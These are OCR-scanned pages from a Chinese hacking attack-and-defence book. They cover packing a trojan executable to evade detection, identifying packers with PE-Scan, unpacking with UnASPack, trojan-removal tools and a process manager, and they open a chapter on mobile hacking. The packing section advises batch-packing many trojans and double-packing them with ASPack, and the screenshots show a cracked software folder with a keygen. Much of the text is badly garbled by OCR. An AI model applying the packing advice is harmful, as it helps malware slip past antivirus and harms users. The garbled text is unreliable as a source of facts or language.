到 在 压缩 前 备份 程序 厂 保留 额外 数据 

强制 压缩 退出 保存 设置 

处理 共 享 节 厂 使 用 Shel1 右 键 扩展 

厂 加 载 后 自动 运行 厂 更 新 dos stub 部 分 


[w 使 用 Windows DLL 加 载 囊 IY 最 大 程度 压缩 (win9x :不 支持 ) 
三 保留 原文 件 的 大 小 厂 兼容 性 压缩 


节 名 称 : - 
人 久 用 户 指定 节 名 路 于 8 让 字符 ): [msp 〇 洒 祭 所 有 
人 〇 使 用 随机 数 命名 (0000p00-9999999) 语言 : 








国 切换 至 “配置 选项 " 勾 选 “ 处 理 共享 节 ” ” 单 击 “ 打 开 ” 按 钮 。 
选项 卡 。 等 重要 参数 。 
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EE 当 
#1 黑 
靳 


ey > 
2 攻防 从 入 门 到 精通 
全 人 人 他 


STEP03: 选择 可 执行 文件 STEP04: 开始 压缩 








文件 (0) 选项 (6) 帮助 出 ) 版 本 3.7 
如 文件 压缩 | 六 目录 压缩 | 品 配置 选项 | aR 关于 | 
|cnseepro6. 1. 197_Lite 等 图 像 视频 等 编辑 软件 \ACDSee\ACDSee. Pro. v6.2.212. Incl. a 
校 验 FE 格 式 人 E32)... 
FE 六 数目 











:00000005 (h) 
:00400000 (h) 
:00021000 (h) 

站 大 小 :00001000 
==-- 支 持 小 站 请 。 acdsee-pro-6-3 | 办 :0001Co0l 0 
帮忙 点 去 --== 2bit.exe r 9 :00001000 (h) 
3 :00000200 (h) 





Ga tutuDisk (W:) 
有 MSN 上 的 “3 

52224 虽 )- 汽 3087 B) 压缩 率 : [-1.7%] 

全 网 络 文件 压缩 完成 . 

呵 4L8QD1ETPGK| ， | 

jm ZKG 








- 





文件 和 名 (N): 木马 .exe 
打开 心 ) 








选 定 可 执行 文件 后 单 击 “ 打 开 ” 按 钮 。 单 击 “ 压 缩 ” 按 钮 ， 对 木马 程序 进行 压缩 。 


1 ) 当 有 大 量 的 木马 程序 需要 进行 压缩 加 壳 时 ， 可 以 使 用 “北斗 程序 压缩 ” 
的 “目录 ”压缩 功能 ， 进 行 批量 压缩 加 充 。 

2 ) 经 过 “北斗 程序 压缩 ”加 充 的 木马 程序 ， 可 以 使 用 ASPack 等 加 充 工具 
进行 再 次 加 充 ， 这 样 就 有 了 两 层 充 的 你 护 。 


提示 





5.3.3 ”使 用 PE-$Can 检测 木马 是 否 加 过 过 


PE-Scan 是 一 个 类 似 于 FileInfo 和 PE iDentifier 的 工具 ， 可 以 检测 出 加 过 时 使 用 了 哪 种 
技术 , 给 脱 壳 、 汉化 、 破解 带 来 了 极 大 的 便利 。 PE-Scan 还 可 检测 出 一 些 壳 的 入 口 点 (OEP)， 
方便 手动 脱 壳 ， 对 加 过 软件 的 识别 能 力 完全 超过 FileInfo 和 PE iDentifier， 能 识别 出 绝 大 多 
数 壳 的 类 型 。 另 外 ，PE-Scan 还 具备 高 级 扫 摘 器， 有 具备 重建 脱 壳 后 文件 的 资源 表 功 能 。 

有 具体 的 使 用 步骤 如 下 。 

STEP01: 运行 PE-Scan STEP02: 设置 相关 选项 























lv 训 别 区 段 标签 











单 击 “ 选 项 ”按钮 。 加 根据 提示 信息 国 单 击 ' 关 闭 ' 
勾 选 复 选 框 。 按钮 。 
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< 第 5 剖 





STEP03: 返回 主 界 面 


pe-scan :2 D:V\ 木 马 .exe 





a | ns] WR 


FE 法 识别 的 加 过 /加 密 类 型 





基 


单 击 “ 打 开 ” 按 钮 。 
STEP05: 查看 文件 加 壳 信 


pe-scan :2 DA 木马 .exe 


时 











可 能 的 加 这 类 型 : : aspack 2.28 
http//www.aspack CO 











文件 经 过 “aspack 2.28” 加 壳 。 


STEP07: 查看 最 接近 的 匹配 信息 


全 
aspack Zl 2: 30333% 


pe-shield 0.25 :: 
telock D.TD :: 


telock D.Tl :: 

telock D0.80 : : . 

upr QTl=0 Te:: 

Ee seyps UsTobe: 21. 88% 


单 击 启 发 特征 下 的 “入 口 点 ”按钮 ， 查 看 最 接近 的 


匹配 信息 。 


5.3.4 使 用 UnASBPack 进行 





木马 攻防 


STEP04: 选择 要 分 析 的 文件 


查找 范围 I): | MD ACDSee. Pro. v6.2.212. Incl. Ke "| 个 名 施 国 > 


从 


名 称 修改 日 期 


局 Keygen 2014/2/8 16:43 | - 
他 acdsee-pro-6-32bit.exe 2013/3/7 0:18 1 


:三木 马 ,exe 2014/2/11 9:52 
禾 木 马 l.exe 2014/2/9 16:54 ~ 
a = Mm | } 

文件 名 部 : 。 奈 纪 [exe [row | 


妈 件 类 型 [T): |PE 忆 性 [exef scr/ cpl/ dll/ ocx/ sys] v 名 消 





人 


选中 要 分 析 的 文件 。 单 击 “打开 ”按钮 。 
STEP06: 查看 入 口 点 、 偏 移 量 等 信息 





入 口 点 000247F7 二 移 量 00002BFT 
原 入 口 点 不 可 用 








国 单 击 “入口 点 " 按钮 ，。” 图 单 击 “ 高 级 扫描 ， 
查看 入 口 点 、 偏 移 量 等 按钮 。 


信息 。 


STEP08: 查看 最 长 的 链 等 信息 


。 启发 特征 :: 
匹 醒 度 
pe-bundle 2.01.2-2.42 :: 0003h 谤 特征 :: 


pe-shrink 0.29b :: O002h 区 SS 


pe-shrink 0. 45b :: Dbbzh 
pe-shrink 0. TDb :: O002h 
pe-shrink 0.Tlb :: O002h 


单 击 链 特征 下 的 “入 口 点 ”按钮 ， 查 看 最 长 的 链 等 


信 /NO 


在 得 出 木马 的 加 壳 程 序 之 后 ， 怠 需要 找到 原 加 壳 程 序 进 行 脐 壳 ， 上 述 木 马 便 用 ASPack 
进行 加 壳 ， 所 以 需要 使 用 ASPack 的 脱 壳 工具 UnASPack 进行 脱 壳 。 有 具体 的 操作 步骤 如 下 。 
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取 RS 四 ey > 

全- 攻防 从 入 门 到 精通 

新 全 人 人 他 

STEP01: 启动 UnASPack STEP02: 打开 UnASPack 界面 








康 件 (编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


组 织 ™ 包含 到 库 中 ™ 共享 了 新 建文 件 去 


FF7 收藏 去 

思 下 载 We 
圈 点 面 沱 这 个 是 一 MSFack 2.1 脱 壳 程序 ， 2 给 地 汉化 下 
: ed BY: 天 司 之 RQ: 1581901 
i UnAspack2.1 汉 


司库 化 版 .exe 





下 载 UnASPack 并 解压 到 本 地 计算 机 ， 双 击 UnAS- ” 单 击 “ 文 件 ” 按 钮 。 
Pack 快捷 图 标 。 


STEP03: 选择 要 脱 壳 的 文件 STEP04: 开始 脱 壳 


你 要 脱 的 文件 : 
[E E:\weiwel 3894 (1). exe | 文件 | 


国 1 意 总 


elsave.exe UnAspack2.1 汉 | welwel 3894 ] 


网 稍 仿 六 








这 个 是 一 hsPack 2| ! 脱 这 程序,，- 仿 关注 事 给 他 汉 估 下 
: 天 1 = Q: 158 

am 

选中 要 脱 壳 的 文件 后 单 击 “ 打 开 ” 按 钮 。 团 查看 生成 的 文件 路 径 。 单 击 “ 脱 壳 ” 接 铂 
即 可 成 功 脱 壳 。 


© 使 用 UnASPack 进行 脱 充 时 要 注意 ，UnASPack 的 版 本 要 与 加 这 时 的 
提示 。 ASPack 的 版 本 一 致 ， 才 能 够 成 功 为 森马 脱 这 。 


5.4 ”木马 清除 软件 的 使 用 


如 果 不 了 解 发 现 的 木马 病毒 ， 要 想 确定 木马 的 名 称 、 入 侵 靖 口 、 隐 藏 位 置 和 清除 方法 
等 都 非常 困难 ， 这 时 就 需要 使 用 木马 清除 软件 清除 木马 。 

















3.4.1 用 木马 清除 专家 清除 木马 


木马 清除 专家 2014 是 一 球 专 业 防 杀 木 马 软 件 ， 可 以 彻 撒 公 录 各 种 QQ 盗 写 木马 、 网 游 
盗号 木马 、 墨 客 后 门 等 上 万 种 木马 间 诬 程序 。 有 具体 的 操作 步骤 如 下 。 
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木马 攻防 


STEP01: 启动 木马 清除 专家 2014 STEP02: 查看 扫描 结果 
为 木马 清除 专家 2014 ”专业 木马 查 杀 软 件 国 团 


re 身 木马 清除 专家 2014 ”专业 木马 查 杀 软件 
木马 清除 专家 2@14 太 也 洼 院 去 安 > 
® - 


了 so 
要 


0201 敌 


YB LR < 2% 
| :3] 查看 最 新 推荐 团 系统 监控 








加 系统 这 

















监控 开始 [监控 级 别 : 中 ]....…… 
A e、 团 系统 监 
扫 驻 内存 人 
”| 
系统 信息 4 1 和 = 
[G 扫描 硬盘 完成 , 疫 有 发现 欧 胁 . 
我 要 举报 正在 扫 撞 内 存 和 系统 关键 位 置 . .。 
@ | 和 
系统 信息 
EE 
我 要 举报 














打开 木马 清除 专家 2014 主 界面 ， 并 单 击 左 侧 的 “ 扫 ”扫描 完成 后 可 直接 查看 扫描 结果 。 


描 内 存 ” 按 钮 。 
STEP03: 扫描 硬盘 


为 木马 清除 专家 2014 ”专业 木马 查 杀 软件 








< 


@、 
扫描 内 存 












S21 增强 引擎 分 析 0 


C:\Windows\assembly\GAC_NSIL\System. Core\3.5.0.0_bT7s5c561934e089\System. Core. dll 
开始 扫 扩 Windows 系 统 目录 ... 











扫描 硬盘 





系统 信息 











〇 注册 更 新 | 口 使 用 增强 型 分 析 引 擎 扫描 口 扫描 完成 后 自动 关机 


单 击 “扫描 硬盘 ” 按钮， 有 三 种 扫描 方式 ， 根 据 需要 ”开始 扫描 后 可 以 随时 单 击 “ 停 止 扫 描 ” 按 钮 终止 扫描 。 
单 击 其 中 一 个 按钮 。 
STEP05: 查看 系统 信息 STEP06: 查看 进程 信息 











如 木马 消除 专家 2014 专 北 木马 查 杀 软件 
= 二 
信 寺 Jz 降 过 到 









: Xe 2O1/1 





0201 版 














进程 识别 信息 
进程 名 称 :services. exe 公司 名 称 : 
系统 核心 服务 程序 


| 程序 路 径 

















ASystemRoot\Systen32\smss. exe 
国 可 用 内 存 916[31%] 


0.16 MB C: Windows\system32\wininit. exe 


108. 47 MP 











C:\Windows\system32\winl ogon. exe 























内 存 进程 数 68 主 盘 可 用 空间 | 8.5558 











系统 运行 时 间 | 逢 时 44 分 











C:\Windows\system32\l sm. exe 





C:\Windows\system32\svchost. exe 


外 
Ost. exe 站 
el i | 全 | i Vc. exe .$3 C:\Program Files\Baidu\Bai duAn\l. 1.0.469\BaiduAinSvc, exe 
a 吃 公 svchost. exe .和 


C:\Windows\system32\svchost. exe 

















单 击 “ 系 统 信息 ”按钮 ， 圈 单 击 “ 优 化 内 存 ” 
可 查看 到 CPU 占 用 率 以 及 内 ”按钮 可 优化 系统 内 存 。 理 " 下 的 “进程 管 ” 别 信息 ”文本 框 中 查看 该 进程 的 
存 使 用 情况 等 信息 。 理 ” 按 钮 。 信息 ， 遇 到 可 疑 进程 可 单 击 “ 中 
止 进程 ”按钮 。 
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合 人 他 他 





STEP07: ”查看 启动 项 目 







四 木马 青 除 专家 2014 ”专业 木马 查 杀 软件 


= TL 3: es = 
人 3: 
A 








¢ 201 








项 目 识别 信息 
项 目 名 称 :380Safetray 公司 名 称 :360. cn 
5 全 二 雪人 防 态 市 心 本 














程序 位 置 













ES 
ew 


A rPass3000_ICBC C:\Programn Files\ICBCEbankTools\Feitian-InterPass3000\certd_nps30.|, 





“C:\Program Files\Spybot - Search & Destroy 2\SDTray, exe” 


ee 
下 BaiduAnTray 


| 凑 林 马 青 除 专家 


“D'\Program Files\360\360safe\safemon\360Tray. exe” /siart 
SysTray. Exe 

“C:\Program Files\Baidu\BaiduAn\l. 1.0. 469\BaiduAnTray. exe” -stmd=$ 
了 :` 安 装 \ 水 马 清 除 专家 2014\naqgczj. exe 

0.,, C:\Programn Piles\Microsoft Office\0fficelS\OCHelper. dll 
0:` 安 装 \BHD\Xunl eiB}D7. 2. 13. 3882. dll 

edirectio... C:MPROGRA I\MICROS 3\0FficelS\URLREDIR DLL 


C:\Program Files\ICBCEbankTool<\ICBCAntiPhishine\ICBC _WIN32\Icbe_.|. 





le C:\Program Piles\Common Files\Tencent\QQMiniNL\43\Browser\AQIEHel. |. 





C:\WUsers\Adninistrator\AppData\Roanine\Tencent \QQ\QQAntiPhishine'\. | 


查看 启动 项 目 详细 信息 ， 
单 击 “ 删 除 项 目 ” 按 钮 可 删 


除 该 木马 。 
STEP09: 绑 定 网 关 IP 与 网 关 MAC 


全 本 马 清除 专家 2014 专业 木马 查 杀 软件 








国 间 二 三 


管理 ” a 


芭 we 所 腾 车 贱 区 和 


隅 高 仓库 





修复 系统 

















国 单 击 “ARP 
绑 定 ”按钮 。 


输入 IP 地 址 和 MAC 地 址 ， 
并 勾 选 “开启 ARP 单 向 绑 定 功 
能 ” 复 选 框 。 

STEP11: 查看 网 络 状态 


木马 清除 专家 2014 ”专业 木马 查 杀 软件 


d= “< 0 A Ep 
木马 溪 降 2014 





| 本 机 地 址 


192. 166. 1.10 





219. 236. 237. 134 
219. 238. 237. 143 
81.135.175.87 
123. 128. 50.41 
27. 115. 124. 156 
123.125.69.209 
1235.125.69.209 
123.125.69.209 


192. 168.1.10 
192_168.1.10 
192. 168.1.10 
192. 168.1.10 
192. 168.1.10 
192. 166.1.10 
192. 168. 1.10 

















单 击 “ 网 络 


加 查看 进程 、 端 口 、 远 程 


状态 ”按钮 。 地 址 、 状 态 等 信息 。 
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攻防 从 入 门 到 精通 


STEF08: 修复 系统 








国 半 二 “修复 ” 国 根据 提示 信息 单 击 页 面 中 的 
系统 ”按钮 。 修复 链接 对 系统 进行 修复 。 


> 


IE 浏览 器 修 


STEP10: 


2 
"4 IE 浏览 器 修复 





回 修复 下 主页 和 有 人 认 页 
回 修复 匡 搜索 引擎 





修复 被 恶意 锁定 的 IE 主页 相关 项 目 











as | A 览 器 . 
国 匀 选 需要 修复 的 选项 ， 
单 击 “ 开 始 修复 ”按钮 。 


STEP12: 删除 顽固 木马 


加 木马 清除 专家 2014 ”专业 木马 查 杀 软件 是 因 


清 聊 专 表 2058 2 


单 击 “ 修 复 IE” 
按钮 。 


0201 版 
































辆 单 击 “辅助 ” 国 单 击 “浏览 添加 文件 ”按钮 ， 


工具 ”按钮 。 再 单 击 “开始 粉碎 ”按钮 ， 


固 木 马 。 


删 项 





木马 攻防 





STEP13: 多 种 辅助 工具 STEP14: 查看 监控 日 志 


为 木马 清除 专家 2014 ”专业 木马 查 杀 软件 





[0 系统 监控 日 志 ”|[2014 年 2 用 虽 本 









查看 YINDOWS 版 本 

















〇 ”注册 更 新 上 
单 击 “ 其 他 辅 可 根据 功能 有 针对 性 单 击 “ 监 控 定期 查看 监控 日 志 ， 找 黑客 
助 工 具 ” 按 钮 。 地 使 用 各 种 工具 。 日 志 ” 按 钮 。 入 侵 痕 迹 。 


9. 生 2 ”用 木马 清 站 夫 清 除 木 马 


木马 清道 夫 是 一 款 专门 查 杀 并 可 辅助 查 杀 木马 的 工具 ， 它 可 自动 查 杀 近 百 万 种 木马 病 
毒 ， 拥 有 海量 木马 病毒 库 ， 配 合 手动 分 析 ， 可 近 100% 对 未 知 木 马 病毒 进行 查 杀 。 木 马 清道 
夫 不 仅 可 以 查 木马 病毒 ， 而 且 可 以 分 析出 恶意 程序 、 广 告 程序 、 后 门 程序 、 黑 客 程序 等 。 
下 面 以 扫描 木马 和 扫描 硬盘 为 例 介绍 木马 清道 天 的 使 用 。 




















STEP01: 启动 木马 清道 夫 2010 STEP02: 进入 主 界 面 


”木马 清道 夫 - 升 级 木马 库 


> 本 


> i 
A Fl" ao 可 | LS 4 ] 
本 5 


je 


第 一 次 运行 ， 请 先 更 新 木马 病毒 库 到 最 新 版 本 


一 了 


请 点 击 “ 更 新 ” 


可 疑 模块 探测 


< 3 
K 
i 


智能 升级 


Go 





第 一 次 使 用 时 先 单 击 “ 更 新 ”按钮 对 木马 病毒 库 进 ”更 新 完成 后 进入 木马 清道 夫 主 界面 ， 单 市 “扫描 进程 
行 更 新 。 按钮 。 
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STEP03: 扫描 木马 


I re Ts 
A A er om sm 
= oe A Ter, 





和 * 


可 锋 木 马 病 毒 /广告 间谍 / 泪 意 软件 进程 显示 


查 :360se. exe 

得 :360se. exe 

香 :WTINWORD. EXE 

和 理 :0SFFSVC.EXE 
:QQProtect. exe 
:QQ. exe 

得:TXP]atform exe 
:dlhost. exe 

得 :Troj anwall. exe 
:FICleaner. exe 

得 :ScanProcess. exe 

信和 理 : svehost. exe 





单 击 “ 扫 描 ” 按 钮 对 系统 进行 扫描 。 


STEP05: 扫描 硬盘 


EN 


智能 升级 


本 








攻防 从 入 门 到 精通 


STEP04: 查看 扫描 结果 


可 疑 木马 病毒 /广告 间谍 /恶意 软件 进程 显示 


:QQPreteet exe 
:QA. ex 

人 S 否 : TXP1 atform. Exe 
:lhost. exe 


:Trojanwall. exe 


团 查 看 扫描 结 。 国 选 中 扫描 到 的 木马 文件 后 单 
果 并 单 击 “ 确 。 ” 击 “ 清 除 ”按钮 。 
定 ”按钮 。 


STEP06: 高 速 扫描 硬盘 


4 木 声 清 这 大- 高 可 太 盘 打 措 


木马 病毒 /广告 间 谨 /恶意 软件 列表 
文件 名 | 路 径 





定 区 域 描 的 文件 数 3 描 时 间 3 描 设置 
罗 特 定 目录 区 域 秒 [ 园 强 行 清除 
园 址 感 目 录 区 域 园 记 县 


| ED Er es) Ci CE CR Ce 


区 后 。 请 有 好 和 局 计 和 村 。 然后 再 次 扫描 注册 表 。 
靖 确 扫描 硬盘 





ee 请 进行 可 磊 模 块 探测 


国 单 击 “ 扫 描 硬 盘 ” 按 钮 ， 在 弹出 的 菜单 中 单 击 ” 单 击 "扫描" 按钮 即 开始 高 速 扫 描 。 扫 描 完 成 后 可 对 


“高 速 扫描 硬盘 


全 全 
DD xXo 


5.4.3 ”在 “Windows 进程 管理 


当前 运行 的 执行 程序 。 


扫描 出 的 木马 进行 清除 或 隔离 。 


器 ”中 售 理 进程 
所 谓 进程 是 指 系统 中 应 用 程序 的 运行 实例 ， 








征 应 用 程序 的 一 次 动态 执行 ， 是 操作 系统 


通常 按 《〈Ctrl+Alt+tDelete》 组 合 键 ， 选 择 “ 局 动 任务 管理 器 ” 即 可 打 





开 “Windows 任务 管理 器 ”窗口 。 在 “进程 ”选项 卡 中 可 对 进程 进行 查看 和 管理 


要 想 更 全 面 地 对 进程 进行 管理 ， 
体 的 操作 步 又 如 下 。 
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还 需要 借助 于 “Windows 进程 管理 器 ” 才 能 实现 L， 具 





STEPO1: 


启动 Windows 进程 管理 器 


LA 


STEP02: 查看 进程 描述 信息 





屿 Windows 进程 管理 器 








列表 (D 进程 (P) 设置 (S$) ”帮助 (H) 
进程 管理 ”| 端口 监听 | 系统 信息 | 同 自动 屏 蕊 危险 进程 问 开机 自动 运行 回 窗 口 置 页 
Ds 他 站 看 A i @ si 
并 和 讲 io 4 


[EH 
























System SYSTEN 

SNSS. exe SYSTEN 
esrss, exe SISTEN 
wininit. exe SYSTEN 

Csrss, exe SISTEN 
Services. exe SYSTEN 
inlLoeon. exe srsSTEN 

lsass. axe SYSTEN 

lsm, exe SYSTEN 
svehost. exe SYSTEN 
svehost. exe WETYORK SERVICE 
RsNerSve. exe SYSTEN 
RaviiorD SYSTEN 
svehost, LOCAL SERVICE 
svehost. SYSTEN 
svehost, SYSTEN 
svehost. LOCAL SERVICE 
rhulongfangyu, exe SYSTEN 
svehost. exe HETYORK SERVICE 
spoolsv, exe SYSTEN 
svehost, exe LOCAL SERVICE 
svehost. exe LDCAL SERVICE 
IcbcDaemon. exe SYSTEN 


C: \WINDOWS\sysiem32\smss, exe 
C:\Windows\sysiem32\csrss. exe 
C:\Windows\system32\wininit, exe 
C:\Windons\systiem32\csrss. exe 
C:\Windons\systiem32\services. exe 
C:\Windows\systiem32\winlogon, exe 
C:\Windons\systiem32\lsass. exe 
C:\Windows\sysiem32\lsm, exe 
C:\Windows\sysiem32\svehost. exe 
C:\Windows\sysiem32\svchost exe 
C:\Program Files\Risine\RSD\RsllerSve, exe 
C:\Program Files\Risine\RAV\RadonD). exe 
C:\Windons\sysiem32\svchost. exe 
C:\Windows\systiem32\svchost. exe 
C:\Windows\sysiem32\svchost. exe 
C:\Windons\systiem32\svychost, exe 
C:\Program Files\360\360Safe\deepscan\rhudo 
C:\Windons\system32\sychost, exe 
C:\Windows\systiem32\spoolsv exe 
C:\Windons\sysiem32\svchost. exe 
C:\Windows\system32\svchost. exe 
C:\Program Files\ICBCEbankTools\ICBCAntiPhi: 


图 图 








88888888888888888888888 





| 回回 田 轿 图 锡 回 回 回回 信 回 回回 日 四 革 四 是 日 











进程 数 : 63 ”CPU: 7% 内 存 : 383 / 2047 是 
一 一 


Yindows 进程 


解压 缩 后 双击 “PrcMgr.exe” 图 标 ， 打 开 “Windows 
进程 管理 器 ”窗口 ， 查 看 系统 当前 正在 运行 的 所 有 
进程 。 

STEP03: 查看 进程 模块 


组 Windows 进程 管理 器 


香 器 Y4. 12. 20080509 - 数据 库 版 本 2008-04-23 


Wew. jpeXe con 

















列表 (D “进程 (P) 设置 (S) ”帮助 (H) 





Sa Idle Process SYSTEN 
System SYSTEN 
SMmSs. exe SISTEM 
CSTSS，eXe SYSTZW 
Wininit, exe SYSTEN 
Csrss, exe SYSTEN 
Services. exe SYSTEN 
winlogon exe SYSTEN 
lsass. exe SYSTEM 
lsm. exe SYSTEN 
svehost. exe SYSTEN 
svehost, exo WETIWORK SERVICE 
RslerSve. exe SYSTEN 
Ravllonl. exe SYSTEN 
svchost, exe LOCAL SERVICE 
svechost, exe SYSTEN 
svchost, exe SYSTEN 
svchost, exe IDCAL SERVICE 
zhudonefangeyu. exe SYSTEM 
svehost, exe NETWORK SERVICE 
spool sy. exe SYSTEN 
svehost, oxo LDCAL SERVICE 
svehost, exe LDCAL SERVICE 
IcbcDaemon. exe SYSTEN 
mn | 


1 国人 多 日 日 四 日 昌 加 日 四 攻 四 是 





四 的 国 国 


区 





] 








888888888888888888888882 








四 | 四 





























几 Li 进程 数 : 64 。_CPV: 39% 内 存 : 407 / 2047 最 Yintows 进程 管理 器 W. 12.20080509 - 数据 库 版 本 2008-04-23 , jpexe. con 
选择 一 个 进程 选项 ， 单 击 “ 描 述 ” 按 钮 ， 查 看 相关 
信 NO 


STEP04: 操作 进程 选项 


揭 Windows 进程 管理 刁 Esl 





列表 (L) 进程 (P) ”设置 (S$) ”帮助 (H) 
| 进程 官 蜡 ”| 端口 监听 “| 系统 信息 





门 自动 屏蔽 危险 进程 四 开机 自动 运行 ”门窗 口 置 顶 





System Idle Process 进程 包含 77 个 模块 


C:\Windows\SYSTEN32\nt dll. dll 
C:\Windows\system32\kernel32, dll 
C:\Windows\system32\KERNELBASE. dll 
C:\Windows\system32\MSVYBYMGO, DLL 
C:\Windows\system32\USER32. dll 
C:\Windows\system32\GDI32. dl 
C:\Windows\system32\LPK. dll 
C:\Windows\system32\USP10. dl 
C:\Windows\system32\msvyecrt, dll 
C:\Windows\system32\ADVAPI32, dll 
C:\Windows\SYSTEN32\sechost. dll 
C:\Windows\system32\RPCRT4, dll 
C:\Windows\system32\0ole32. dll 
C:\Windows\system32\0LEAUT32. dll 
C:\Windows\system32\INM32. DLL 
C:\Windows\system32\MSCTF. dll 
C:\Windows\system32\CRIPTBASE. dll 
C:\Windows\system32\uxtheme, dll 
C:\Program a 人 和 全 让 是 
C:\Windows\systen32\SIEIL32. 
C:\Windows\system32\SHLYAPI. mi 
C:\Windows\system32\WININET. dll 
C:\Windows\system32\Normaliz, dll 
C:\Windows\system32\iertutil. dll 
C:\Windows\system32\urlmon, dll 
C:\Windows\system32\CRYPT32, dll 
C:\Windows\system32\MSASH1. dll 
C:\Windows\system32\wintrust, dll 
C:\Windows\system32\imagehlp. dll 
C:\Program Files\Risine\RAV\rsagr. dl 


System Idle Process 
System 
Esnss. exe 


lcsrss. exe 


人 


Ewininit. exe 
四 csrss. exe 
services. exe 
年 -inleeor exe 

四 1sass. exe 

四 了 1 sm. exe SYSTEN 
nsvchost., exe SYSTEN 
有 svchost. exe HETWORK SERVICE 
ERshlerSve,. exe SYSTEN 
妖 Ravdlon]. exe SYSTEN 
Bsvehost. exe LOCAL SERVICE 
svchost. exe SYSTEN 
Bsvchost, exe SYSTEN 
Esychost. exe LOCAL SERYICE 
Br rhudonefaneyu. exe SYSTEN 
Cy 
加 


只 全 吕 。。o 


A 
88888888882888888888888% 


svchost. exe HETWORK SERYICE 
Spoolsv, exe SYSTEN 





LOCAL SERVICE 
向 svchost, exe LOCAL SERVICE 
[EIcbcDaemon. exe SYSTEN 

< LN 


[esvchost. exe 














4 








- 部 区 区 下 让 站 下 政变 东区 东区 下 a 刘 六 刘 








进程 数 : 87 CPV: 8% 内 存 : 516 / 2047 邮 Windaows 进程 管理 器 Y4. 12.20080509 - 数据 库 版 本 200 条 04-23 


单 击 “ 模 块 ” 按 钮 ， 查 看 该 进程 的 进程 模块 。 
STEP05: 查看 属性 


由 smss.exe 屋 性 


以 前 的 版 本 


SMmMSS. exXe 


WWE. jpexe. Com 











[一 


文件 类 型 
描述 : 
位 置 
大 小 : 
占用 空间 : 


创建 时 间 |: 
修改 时 间 : 
访问 时 间 : 


应 用 程序 . exe) 
Yindows 会 二 管理 器 





C: “WINDOWS‘system32 


68.0 王 (69, 632 字 节 ) 
66.0 到 (69,632 字 节 ) 





2013 年 4 月 10 日 ， 8:52:09 
2013 年 3 月 19 日 ，10:49:16 
2013 年 4 月 10 日 ，8:52:09 


只 读 R) ” 门 隐 藏 0 


















列表 (L) 壕 程 (P) 设置 (S) 帮助 (H) 
进程 管理 ”| 庙 口 监听 “| 系统 信息 
Orme 人 全 首尾 进程 ”区 吐 入 件 ” 国 | 查看 属性 





回 自 动 屏 普 危险 进程 回 开 机 自动 运行 回 窗口 置 栅 
网 xf 的 Bi 者 检查 更 新 


smss. exe 进程 包含 1 个 模块 
[c: Windows\SYSTEI32\ntdll.dl 





System Idle Process SYSTEM 
i SISTEM 
bE smss. exe SYSTEMN 
Csrss. exe SYSTEN 
wininit. exe SYSTEN 
csrss. Exe SITSTZW 
sorvices. exe SYSTEM 
加 winlogon ee SYSTZW 
(lsass. exe SYSTZW 
1sm. exe SYSTEM 
sychost. exe SYSTEM 
NETWORK SERVYICE 
RsMerSve. exe SYSTEM 
SYSTZW 
.exe LOCAL SERVICE 
.eXe SYSTEN 
. exe SYSTEN 
.Xe LOCAL SERYICE 
zhudongfangyu exe SYSTEM 
'svchost. exe NETWORK SERYICE 
四 习 spoolsy. exe STSTEN 
ea exe LOCAL SERYICE 
svchost. exe LOCAL SERYICE 
IcbeDaenon. exe SYSTZW 
| 加 


svchost. exe 

















[ 剧 新 列表 | | 导出 列表 | 

















内 存 : 538 / 2047 上 Windq 


右 击 进程 选项 ， 
STEP06: 


图 Windows 进程 管理 器 
| 列 碌 册 。 进 很 (P) 设置 (S$) 帮助 (H) 


系统 信息 


s 进程 管理 器 Y4. 12. 20080509 - 数据 库 版 本 2008-04-23 


在 快捷 菜单 中 单 击 “查看 属 
系统 信息 设置 


WEE. jp exe. COm 





属性 " 命令 。 








CPV 使 用 率 : 10% 


物理 内 存 使 用 率 : 23% 


Service Pack 


篇 制 告 商 








7 f 2047 WB 


| 进程 孝 : 6 


CPU: 10% 内存: 4 Windows 进程 管理 器 Y4. 12. 20080509 - 数据 库 版 本 2008-04-23 


在 “系统 信息 ”选项 卡 中 可 查看 系统 的 有 关 信 息 ， 并 
监视 内 存 和 CPU 的 使 用 情况 。 


Www, jpPexe. Com 





129 





手机 墨客 攻防 


在 智能 手机 已 经 十 分 普及 并 且 仍 在 不 断 发 展 的 今天 ， 手 机 中 病毒 、 信 息 被 
窃取 、 手 机 支付 出 现 问题 、 账 号 密码 被 盗 ， 从 而 威胁 到 用 户 财产 安全 的 例子 已 
经 很 多 ， 所 以 手机 安全 已 经 成 为 人 们 倍加 关注 的 问题 。 


获取 Android Root 权限 

安 卓 手机 备份 与 刷机 

苹果 手机 越狱 

手机 蓝牙 攻击 曝光 

手机 拒绝 服务 攻击 曝光 
手机 电子 邮件 攻击 曝光 
手机 病毒 与 木马 攻防 
手机 加 密 技术 

手机 支付 安全 防范 

手机 优化 及 安全 性 能 的 提升 





< 第 6 章 
手机 黑客 攻防 


6.1 初 识 手机 黑客 


纵 观 当今 的 互联 网 业界 ， 病 毒 木 马 泛 小 ， 各 种 病毒 变 体 花 样 日 出， 恶意 攻击 手段 层 出 
不 穷 ， 下 面 对 智 能 手机 操作 系统 及 币 见 的 手机 攻击 关 型 进行 简要 介绍 。 








0.1.{ 智能 手机 操作 系统 


智能 手机 操作 系统 是 一 种 运算 能 力 及 功能 比 传统 功能 手机 更 强 的 操作 系统 。 使 用 最 多 
的 操作 系统 有 : Android、iOS、Symbian、Windows Phone 和 BlackBerry OS。 它 们 之 间 的 
应 用 软件 互 不 莱 容 。 

智能 手机 可 以 像 个 人 计算 机 一 样 安装 第 三 方 软件 ， 它 共有 独立 的 操作 系统 以 及 展 好 的 
用 户 界 面 ， 拥 有 很 强 的 应 用 扩展 性 ， 以 及 能 方便 、 随 意 地 安装 和 删除 应 用 程序 。 

1. Android 

Android 是 一 种 以 Linux 为 基础 的 开放 源 代码 操 作 系 统 , 主要 使 用 于 便携 设备 。 目前 尚 
没有 统一 的 中 文 名 称 ， 中 国 大 陆地 区 多 用 “安里 ”( 或 “ 安 致 图 。Android 操作 系统 最 初 由 
Andy Rubin 安 迪 : 算 宾 ) 开 有 发， 最初 主要 文 持 手机 。2005 年 由 Google 收购 注资 ， 并 组 建 
开放 手机 联盟 开发 改良 ， 逐 渐 扩 展 到 平板 电脑 及 其 他 领域 。Android 的 主要 竞争 对 手 是 于 
果 公 司 的 iOS 以 及 RIM 的 Blackberry OS。 

Android 的 Linux Kernel 控制 包括 安全 (Security)、 人 存储 需 管 理 (Memory 
Management)、 程 序 管理 (Process Management)、 网 络 堆 栈 (Network Stack) 和 驱动 程 
序 模型 (Driver Model) 等 。 

